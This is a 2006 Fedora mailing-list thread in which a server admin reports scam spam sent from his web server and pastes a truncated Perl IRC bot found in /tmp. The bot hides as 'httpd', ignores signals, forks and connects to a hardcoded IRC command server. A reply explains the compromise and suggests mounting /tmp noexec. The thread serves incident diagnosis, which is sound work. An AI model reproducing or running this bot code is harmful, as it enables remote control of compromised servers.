Postfix Problems

CodeHeads codeheads at gmail.com
Tue May 23 16:22:29 UTC 2006 

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Tue, 23 May 2006 13:11:46 +0100 Paul Howarth <paul at city-fan.org> wrote:

> CodeHeads wrote:
> >> There is something wrong but I cannot nail it down.
> >>
> >> I am receiving hundreds of bounce backs from the web server I am running.
> >> Not sure how they are sending mail.  The only mail that should be sent is
> >> from forms.  Here is a header of one of queues.  Maybe someone has run
> >> into this.
> >>
> >> V8
> >> T1147739033
> >> K1147739138
> >> N1
> >> P34672
> >> Mhost map: lookup (zdnetmail.com): deferred
> >> F8bs
> >> $_apache at localhost
> >> ${daemon_flags}c u
> >> Sapache
> >> Aapache at code-heads.com
> >> rRFC822; galactica7 at zdnetmail.com
> >> RPFD:galactica7 at zdnetmail.com
> >> H?P?Return-Path: <<81>g>
> >> H??Received: (from apache at localhost)
> >>         by code-heads.com (8.13.4/8.13.4/Submit) id k4G0NrpQ017524;
> >>         Mon, 15 May 2006 20:23:53 -0400
> >> H?D?Date: Mon, 15 May 2006 20:23:53 -0400
> >> H?x?Full-Name: Apache
> >> H?M?Message-Id: <200605160023.k4G0NrpQ017524 at code-heads.com>
> >> H??To: galactica7 at zdnetmail.com
> >> H??Subject: WINNING NOTIFICATION
> >> H??From: NATIONAL LOTTERY <claimsagent_2006_2007 at yahoo.co.uk>
> >>
> >> What is bothering me is this:
> >> by code-heads.com (8.13.4/8.13.4/**Submit**) id k4G0NrpQ017524;
> 
> Right, that should tell you that the mail headers you are looking at 
> seem to be generated by something running as user apache (probably a 
> CGI/PHP script of some kind running via your web server), which is 
> calling the local sendmail on that server to send the mail out. It's 
> nothing to do with postfix at all.
> 
> > Sorry again, but looky what I found in the /tmp dir:
> > The whole thing is not copy and pasted:
> > #!/usr/bin/perl
> > # r00t teh pl4net! gr33t t0 Myhack at DALnet
> > # ------[eof]-----
> > 
> > 
> > 
> > system("kill -9 `ps ax |grep /var/tmp/wops/is |grep -v grep|awk '{print
> > $1;}'`");
> > 
> > 
> > my $processo = 'httpd';
> > 
> > # morgan the code that you need to rip ends here
> > 
> > my @titi = ("Cube-|");
> > 
> > my $sleep='5';
> > my $linas_max='4';
> > my @adms=("apaii","KingFighter");
> > my @hostauth=("roundtable.cif.rochester.edu","202.142.215.209");
> > my @canais=("#conn");
> > my $nick=  $titi[rand scalar @titi];
> > my $ircname =  $titi[rand scalar @titi];
> > chop (my $realname = $titi[rand scalar @titi]);
> > 
> > $servidor='rumble.dal.net' unless $servidor;
> > my $porta='6667';
> > my $VERSAO = '0.5';
> > $SIG{'INT'} = 'IGNORE';
> > $SIG{'HUP'} = 'IGNORE';
> > $SIG{'TERM'} = 'IGNORE';
> > $SIG{'CHLD'} = 'IGNORE';
> > $SIG{'PS'} = 'IGNORE';
> > use IO::Socket;
> > use Socket;
> > use IO::Select;
> > chdir("/");
> > $servidor="$ARGV[0]" if $ARGV[0];
> > $0="$processo"."\0"x16;;
> > my $pid=fork;
> > exit if $pid;
> > die "Problema com o fork: $!" unless defined($pid);
> > 
> > our %irc_servers;
> > our %DCC;
> > my $dcc_sel = new IO::Select->new();
> > 
> > $sel_cliente = IO::Select->new();
> > sub sendraw {
> >   if ($#_ == '1') {
> >     my $socket = $_[0];
> >     print $socket "$_[1]\n";
> >   } else {
> >       print $IRC_cur_socket "$_[0]\n";
> >   }
> > }
> > 
> > sub conectar {
> >    my $meunick = $_[0];
> >    my $servidor_con = $_[1];
> >    my $porta_con = $_[2];
> > 
> >    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp",
> > PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1); if
> > (defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket;
> > 
> > What I cannot understand is how someone can upload to the tmp dir.  I guess
> > I am still learning.  Can someone shed some light on this?
> 
> This is communicating with an IRC server, probably to listen for commands.
> 
> Look at the owner of the script. If it's apache, you can safely say that 
> a webserver exploit was used to upload it. You could try looking at the 
> timestamp of the file, and look in your web server log files for 
> suspicious activity at around that time to get a clue as to how it got 
> there.
> 
> If you have /tmp on a separate partition, I'd seriously consider 
> mounting it noexec,nodev. If it's not a separate partition, I'd 
> seriously consider making one for it on an Internet-exposed web server. 
> Same goes for /var.
> 
> Paul.
> 
That has since been removed and the system re done.  I have been keeping an eye
on /tmp and /var/tmp.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFEczbFfw3TK8jhZrsRAhN/AKDjZlDh+0bV++6XvBfWHBOVTZdIQQCgoVGJ
Unhz/IKmEViCNj3G+YzEZdk=
=T6xG
-----END PGP SIGNATURE-----

More information about the fedora-list mailing list